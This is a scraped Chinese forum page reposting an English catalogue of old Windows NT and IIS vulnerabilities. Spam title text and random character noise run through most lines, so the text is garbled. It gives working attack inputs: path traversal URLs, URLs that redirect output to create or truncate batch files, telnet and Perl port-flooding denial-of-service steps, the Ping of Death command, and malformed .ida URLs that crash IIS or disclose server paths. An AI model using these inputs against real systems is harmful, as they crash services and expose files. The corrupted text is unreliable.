亚洲色一色噜一噜噜噜_在线国产精品一区二区_91国自产拍 精品_国产伦三级一区二区

  • <object id="nlumt"><tt id="nlumt"><pre id="nlumt"></pre></tt></object>
    <legend id="nlumt"><mark id="nlumt"></mark></legend>
    <pre id="nlumt"><tt id="nlumt"><rt id="nlumt"></rt></tt></pre>

    <bdo id="nlumt"><delect id="nlumt"></delect></bdo>

       找回密碼
       注冊

      QQ登錄

      只需一步,快速開始

      NT的漏洞及描述(英文)

      [復(fù)制鏈接]
      1#
      發(fā)表于 2011-1-13 17:12:25 | 只看該作者 |倒序瀏覽 |閱讀模式
      受影響系統(tǒng):4.0,iis 1.09 T: F0 ?+ h* D% V) Y/ o  S  B3 ~
      A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.
      0 S2 W* q. p, A+ N& g$ X
      / _, J$ p! t& z+ d' LA URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.
      * Z/ D' f& w4 N* ^$ o1 ]
      # p% u- p, w. ~2 Q" E4 p0 X2 e! \By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.
      ( ^. ]3 A* i$ z" {. R, `
      + [( `4 }, q, _- G; I--------------------------------------------------------------------& ?( f  X  K5 b

      6 n+ ?4 a2 d3 w1 |受影響系統(tǒng):4.0
      7 D& \: i; r/ y& \# y" H4 R; vA URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.; @0 z" H8 X# o: [& s

      " N+ f. i; U9 O& S/ l6 }8 x2 eIf the file 'target.bat' exists, the file will be truncated.. m! s% a4 h; A4 M- W! d. s
      ) N6 w7 N' _. l. J0 y

      2 g% o+ ]8 G: S5 Y+ r% ]$ WA URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.
      ! W, J% L6 `, t0 m9 w2 G* w+ |
      . H# v( a$ l) t6 c----------------------------------------------------------------------& P* q7 P% i0 P7 W* ^
      2 v! J7 k$ M+ r: L, q) _, p& s1 t
      受影響系統(tǒng):3.51,4.0
      ' k0 _" b2 D7 B0 P% p# N7 XMultiple service ports (53, 135, 1031) are vunerable to 'confusion'.1 m; [6 R3 P9 F' ]  k3 f
      / p& w2 Q$ D, l4 ]6 J2 P
      The following steps;
      & }! B1 C2 L7 L8 v  j
      & `7 n' [. w+ M! ^& x1 ?# ITelnet to an NT 4.0 system on port 135 * i- a% {" K' l1 q: K& J
      Type about 10 characters followed by a <CR>
      1 @1 l1 p: f, H- N# x9 P* `7 EExit Telnet 4 c. h) d1 X$ T; a+ Y/ q2 L
      results in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.9 g  d8 I% H9 j% I4 s

      5 c) U4 B1 f/ k2 f  L4 J" G0 J% x* RWhen launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.# B" o3 V3 u" [% q5 y5 r- J. A

      8 W+ r" n2 v/ {( }- wThe above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.
      ; D$ ]( q( W. P5 \
      / f% I' v4 g) V9 ]If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.
      7 Q/ q1 L- O0 n2 d1 l7 q4 ?4 E  D/ I7 O8 d' d' Y
      The following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):
      : w  m! o+ U5 d. |. f3 |9 j# ^  A
      9 ]* Z& d4 h4 Z) k/*begin poke code*/; x! S% u5 N& n8 y0 O: ^
      4 @8 |2 L' |, A: y  P' A2 l
      use Socket;
      $ z1 M! k( `9 c! W+ ]use FileHandle;
      ' c2 r: M5 U# @, drequire "chat2.pl";
      3 K5 g6 X: b  ]5 V+ `) J/ w" Z8 S: j# Y% l/ r& `8 A0 o
      $systemname = $ARGV[0] && shift;' v9 e7 z$ ?" Q% n$ U# V

      * d0 `( K( Z5 z$verbose = 1; # tell me what you're hitting2 I6 Y$ b6 U1 v" W& l5 c
      $knownports = 1; # don't hit known problem ports+ s% z6 k! X" h- I9 [
      for ($port = $0; $port<65535; $port++) + E7 R: |. {' {; a* b
      {: }2 E9 g% W! D. d

      / o! ^! ?8 W  G" z" s2 u7 `3 [& m  Z3 H( W. P: O5 N
      if ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {
      3 L' S1 p' P  Znext;" s/ J- |' P- E8 m( S& `
      }5 h# m( i" z" N$ d  N: _1 w7 b% m2 `
      $fh = chat::open_port($systemname, $port);
      ' v3 M# y: X: x& z* B$ wchat::print ($fh,"This is about ten characters or more");( f( o% n' h$ E' F+ C" t. R/ s* u- t
      if ($verbose) {7 l( T0 B- O9 v! ~$ O8 @) T6 x' ^
      print "Trying port: $port\n";3 e, P9 J3 ?: n$ x- \
      } / Y& n" O' |/ f1 e
      chat::close($fh);
      + b; ^) l: M1 n6 ]* m6 Q) s$ l) z# s7 \  O( M3 t
      }
      $ i4 M4 y' o! T. v; v5 S2 `' ?" n4 J/ J& Y: S/ J- t, K

      - I; x1 W) H/ Y* ^. K0 O4 r9 v0 x/*end poke code*/6 I: D/ Z: [2 A$ A# l
      ! \8 M* z( q9 t2 R( n+ A( r
      Save the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername
      9 ?( y0 R: \. `$ }* q. h5 \" J- y, m+ b
      --------------------------------------------------------------------------------
      , @7 D9 h) t% |0 R5 N9 h
      4 @  q. B8 V7 X5 q- F; I受影響系統(tǒng):4.06 N1 G- v- H# |  u
      Using a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.
      + d3 t$ S0 H) `* L7 m( `$ K6 L5 I0 `( ]
      This attack causes Dr. Watson to display an alert window and to log an error: ( t0 L6 h5 w6 [1 I

      5 s' E: q0 g4 b2 c  J. L) A"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"& N' ]8 v$ |" w* H7 Q5 C
      , d, y& W1 h: P* O& q- L
      --------------------------------------------------------------------------------+ j, E: W8 y2 M6 E5 q8 F7 b
      3 |5 h* i2 Y4 t( P
      受影響系統(tǒng):3.51,4.0
      ! x4 {1 Q& v+ hLarge packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:
      $ w1 s9 M! \7 u8 K* p- H$ J
      * n; x! v' [: B3 L- qSTOP: 0X0000001E
      5 P) p5 F# u7 RKMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS9 t  {- A0 E7 o0 f$ E
      6 x9 |% l. ?- E& Q+ k' U
      -OR-. X& f# J0 N* _* E5 y: |5 A5 Z3 {
      & F& ^5 i( s  V( c) c" ?/ G% ~
      STOP: 0x0000000A
      7 _6 b5 L3 |. M' k5 _( ZIRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS
      / @+ @( W) n" v. v& {& h# g* e8 r# x* R& ]% b8 n( _' x
      NT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.# [; m: z# F( S3 Q
      6 G' w3 P$ L5 D; J1 P
      --------------------------------------------------------------------------------
      $ I" \8 B* P  V4 O2 K; X. m' b* S" L8 S: k9 i: Q% J; @, w
      Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure).
      6 }: w/ c0 w- b3 O- W! M! q/ b$ N4 w6 p1 ]9 ~$ V$ A/ A- I
      --------------------------------------------------------  A! x& l' Q9 V$ \
      - b' L7 z7 c7 U
      IIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server
      您需要登錄后才可以回帖 登錄 | 注冊

      本版積分規(guī)則

      QQ|本地廣告聯(lián)系: QQ:905790666 TEL:13176190456|Archiver|手機版|小黑屋|汶上信息港 ( 魯ICP備19052200號-1 )

      GMT+8, 2025-4-12 19:28

      Powered by Discuz! X3.5

      © 2001-2025 Discuz! Team.

      快速回復(fù) 返回頂部 返回列表